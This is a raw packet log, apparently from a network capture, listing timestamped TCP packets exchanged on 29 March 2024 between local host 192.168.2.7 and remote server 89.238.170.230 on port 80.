Mar 29, 2024 14:25:41.874872923 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.875098944 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.875137091 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.875149012 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.875161886 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.875186920 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.875205040 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.077881098 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.077986956 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.097454071 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.097579956 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.099029064 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.099087954 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.101078987 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.101104975 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.101118088 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.101145983 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.101195097 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.101195097 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.101213932 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.101321936 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.298144102 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.298263073 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.323873997 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.324012041 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.327260017 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.327296019 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.327328920 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.327342033 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.327353001 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.327415943 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.327446938 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.327537060 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.524091959 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.524111032 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.524168968 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.549901009 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.550024986 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.552983046 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.552998066 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.553011894 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.553024054 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.553035975 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.553042889 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.553066969 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.553095102 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.744399071 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.744415998 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.744488001 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.744488001 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.773514986 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.773531914 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.773597002 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.776350021 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.776421070 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.776453972 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.776468039 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.776508093 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.776540995 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.776601076 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.776653051 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.776654959 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.776701927 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:42.973443031 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.973459959 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:42.973598957 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.005942106 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.005956888 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.006069899 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.006077051 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.006093025 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.006164074 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.006177902 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.006182909 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.006190062 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.006205082 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.006252050 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.006303072 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.193736076 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.193847895 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.193898916 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.193943977 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.226881027 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.226984024 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.227006912 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.227025986 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.227051973 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.227077961 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.227205992 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.227219105 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.227231979 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.227257967 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.227283955 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.414983988 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.415047884 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.451740026 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.451757908 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.451771975 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.451836109 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.451889038 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.451905012 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.451917887 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.451930046 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.451942921 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.451968908 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.451984882 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.641249895 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.641307116 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.682492018 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.682543993 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.682566881 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.682600975 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.682614088 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.682657957 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.682682991 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.682735920 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.682749033 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.682801008 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.682812929 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.682857037 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.859685898 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.859792948 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.905622005 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.905642986 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.905654907 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.905669928 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.905725002 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.905766964 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.906146049 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.906198025 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.906209946 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.906212091 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.906225920 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:43.906238079 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.906254053 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:43.906269073 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:44.084439993 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.084515095 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:44.130050898 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.130067110 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.130079985 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.130091906 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.130168915 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.130182028 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.134218931 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:44.305861950 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.305946112 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:44.357876062 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.357908010 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.357920885 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.357927084 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.357979059 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.358038902 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.358063936 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:44.358098984 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:44.528346062 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.528429985 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:44.576148033 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.576172113 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.576193094 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.576282978 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:44.576289892 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.576334000 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:44.576370955 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.576416016 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:44.742158890 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.742213011 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:44.742471933 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.742532015 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:44.795656919 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.795717001 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:44.795813084 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.795826912 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.795856953 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:44.795885086 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.795886040 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:44.795924902 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:44.795959949 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.796005011 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:44.966748953 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.966782093 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:44.966831923 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:44.966850042 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.024224997 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.024240971 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.024317980 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.024425983 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.024471045 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.024475098 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.024511099 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.024682999 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.024732113 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.024755955 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.024796963 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.194964886 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.194991112 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.195075989 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.256177902 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.256196022 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.256257057 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.256450891 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.256467104 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.256485939 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.256500959 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.256536961 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.256545067 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.256588936 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.418503046 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.418529034 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.418561935 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.418575048 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.475919962 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.476030111 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.476080894 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.476094007 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.476105928 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.476176023 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.476397991 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.476411104 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.476423979 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.476488113 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.529771090 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.529881954 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.639348984 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.639440060 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.639446974 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.639487982 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.696477890 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.696500063 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.696515083 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.696546078 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.696557999 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.696562052 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.696599007 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.753925085 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.754009962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.857707024 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.857791901 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.857856035 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.857891083 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.857913017 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.857988119 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.918668985 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.918688059 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.918700933 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.918756962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.918801069 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:45.975509882 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.975529909 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:45.975627899 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.076467991 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.076538086 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.076929092 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.076942921 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.076987982 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.141598940 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.141650915 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.141669989 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.141683102 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.141690016 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.141700983 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.141726971 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.141735077 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.203583002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.203598022 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.203685999 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.307775974 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.307816029 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.307884932 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.307915926 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.372104883 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.372176886 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.372246981 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.372314930 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.372323036 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.372355938 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.372360945 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.372402906 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.432985067 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.433043957 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.433118105 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.433130026 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.433162928 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.526829958 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.526895046 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.586594105 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.586662054 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.586947918 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.586961985 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.587007046 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.587017059 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.653862000 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.653876066 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.653887033 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.653965950 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.751444101 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.751517057 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.815156937 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.815232038 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.815624952 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.815638065 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.815679073 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.815704107 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.885495901 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.885567904 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.885644913 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.885657072 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.885669947 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.885690928 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.885715961 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.977463007 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.977487087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:46.977531910 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:46.977550030 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.034723997 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.034811020 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.035012007 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.035026073 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.035060883 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.035073996 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.105758905 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.105777979 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.105788946 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.105844975 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.105881929 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.195874929 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.195888996 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.195971966 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.248665094 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.248681068 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.248724937 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.248738050 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.248766899 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.248786926 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.323064089 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.323118925 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.323204041 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.323231936 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.323275089 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.323316097 CET	49699	80	192.168.2.7	89.238.170.230
